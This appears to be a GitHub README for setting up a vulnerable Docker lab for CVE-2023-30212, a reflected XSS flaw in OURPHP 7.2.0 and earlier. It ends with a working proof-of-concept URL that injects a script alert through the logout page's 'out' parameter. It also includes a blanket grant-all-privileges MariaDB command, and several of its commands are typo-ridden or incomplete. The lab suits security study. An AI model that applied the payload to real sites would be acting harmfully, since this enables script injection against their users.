libasmon/-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212

Docker environment and exploit the CVE-2023-30212 vulnerabilityVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks

# create a vulnerable Docker environment that is susceptible to CVE 2023-30212
# Description
Docker environment and exploit the CVE-2023-30212 vulnerabilityVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks

OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php

# Configure Docker

* Download dockerfile and extract it

      https://down.chinaz.com/api/index/download?id=51308&type=code
* Download exploit CVE 2023-30212
* Open Terminal in the folder where you saved the dockerfile
* Install the Docker meachine

     sudo apt update
     
    >sudo apt install docker.io 

* Create a docker image
  
     >docker run -d -p <port> < Docker image id>
    
* check the docker image 
     
    > docker ps
     
* Get a new container id
    
    >bb18debddccc   test      "docker-php-entrypoi…"   4 minutes ago   Up 4 minutes   0.0.0.0:8080->80/tcp, :::8080->80/tcp   angry_turing

* execute an interactive bash session inside a running Docker containe
    
    > docker exec -it bb18debddccc  /bin/bash
    
*Get docker shell
    
    > root@bb18debddccc:/var/www/html# 
    
* set mysql database
    
   > root@bb18debddccc:/var/www/html# mysql

   > Welcome to the MariaDB monitor.  Commands end with ; or \g.
   > Your MariaDB connection id is 38
   > Server version: 10.3.38-MariaDB-0+deb10u1 Debian 10
   > Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
   > Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
   > MariaDB [(none)]>

* MySQL or MariaDB to grant all privileges
     
   > GRANT ALL PRIVILEGES ON . TO ' user account'@'localhost' IDENTIFIED BY 'user password' WITH GRANT OPTION;
      
   This is a SQL command typically used in a database management system like MySQL or MariaDB to grant all privileges to the 'root' user on all databases and tables in the      current system.
         
# Exploit CVE-2023-30212 vulnerability      
       
   > Url: http://localhost:8080/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>

      
   
   >